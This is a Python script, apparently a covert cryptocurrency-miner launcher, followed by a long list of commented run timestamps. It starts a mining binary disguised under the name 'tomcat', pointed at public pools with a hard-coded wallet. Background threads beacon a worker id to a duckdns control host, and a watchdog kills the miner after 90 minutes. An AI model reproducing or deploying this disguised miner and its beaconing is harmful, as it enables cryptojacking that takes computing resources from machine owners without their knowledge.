import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:01.539137
#2018-02-17 16:34:03.004575
#2018-02-17 18:22:04.032022
#2018-02-17 20:10:01.432896
#2018-02-17 21:56:07.071376
#2018-02-17 23:41:04.137903
#2018-02-18 01:29:01.361970
#2018-02-18 03:16:05.828743
#2018-02-18 05:05:09.436574
#2018-02-18 06:57:06.530207
#2018-02-18 08:45:07.470767
#2018-02-18 10:32:05.487073
#2018-02-18 12:17:07.024145
#2018-02-18 14:04:01.791297
#2018-02-18 15:54:07.508171
#2018-02-18 17:45:06.159201
#2018-02-18 19:32:04.246169
#2018-02-18 21:17:01.279758
#2018-02-18 23:04:05.511811
#2018-02-19 00:51:05.733106
#2018-02-19 02:38:01.735045
#2018-02-19 04:24:05.730588
#2018-02-19 06:09:04.367933
#2018-02-19 07:57:07.098124
#2018-02-19 09:48:08.916128
#2018-02-19 11:38:08.911914
#2018-02-19 13:25:08.449871
#2018-02-19 15:12:06.751694
#2018-02-19 17:02:06.728530
#2018-02-19 18:49:09.254857
#2018-02-19 20:37:05.340032
#2018-02-19 22:25:06.444309
#2018-02-20 00:11:01.984859
#2018-02-20 01:58:03.451070
#2018-02-20 03:48:06.010355
#2018-02-20 05:32:07.187421
#2018-02-20 07:16:05.726902
#2018-02-20 09:03:04.421940
#2018-02-20 10:46:01.204630
#2018-02-20 12:32:06.896293
#2018-02-20 14:19:01.263281
#2018-02-20 16:02:01.274653
#2018-02-20 17:49:07.180381
#2018-02-20 19:34:06.332742
#2018-02-20 21:21:08.929203
#2018-02-20 23:05:07.881217
#2018-02-21 00:48:06.325143
#2018-02-21 02:33:05.609340
#2018-02-21 04:23:05.448564
#2018-02-21 06:11:01.673570
#2018-02-21 07:56:05.874333
#2018-02-21 09:41:06.821000
#2018-02-21 11:29:04.942758
#2018-02-21 13:18:05.192739
#2018-02-21 15:03:09.004729
#2018-02-21 17:49:10.590047
#2018-02-21 19:36:01.321010
#2018-02-21 21:23:07.012941
#2018-02-21 23:11:05.095432
#2018-02-22 01:01:09.269220
#2018-02-22 02:48:01.622302
#2018-02-22 04:34:02.195489
#2018-02-22 06:19:03.600294
#2018-02-22 08:06:07.019790
#2018-02-22 09:53:07.347285
#2018-02-22 11:37:09.372745
#2018-02-22 13:26:05.096912
#2018-02-22 15:14:05.697017
#2018-02-22 16:58:01.637882
#2018-02-22 18:47:01.370292
#2018-02-22 20:38:03.776588
#2018-02-22 22:23:02.059275
#2018-02-23 00:10:03.875297
#2018-02-23 01:58:06.199812
#2018-02-23 03:44:06.692590
#2018-02-23 05:32:07.089520
#2018-02-23 07:17:02.032996
#2018-02-23 09:20:09.633334
#2018-02-23 11:26:01.437160
#2018-02-23 13:15:09.117810
#2018-02-23 15:02:09.880200
#2018-02-23 16:52:01.398742
#2018-02-23 18:41:06.471580
#2018-02-23 20:27:05.500195
#2018-02-23 22:14:07.397348
#2018-02-24 00:00:06.105011
#2018-02-24 01:49:05.651550
#2018-02-24 03:42:07.709101
#2018-02-24 05:27:04.392328
#2018-02-24 07:14:01.799707
#2018-02-24 09:04:07.428193
#2018-02-24 11:03:04.124202
#2018-02-24 12:51:07.758120
#2018-02-24 14:39:07.489125
#2018-02-24 16:28:06.429614
#2018-02-24 18:20:07.809559
#2018-02-24 20:06:04.402606
#2018-02-24 21:48:05.583382
#2018-02-25 00:49:04.258053
#2018-02-25 03:51:07.350139
#2018-02-25 06:37:03.880213
#2018-02-25 11:36:06.256498
#2018-02-25 13:45:04.144490
#2018-02-25 15:19:01.558284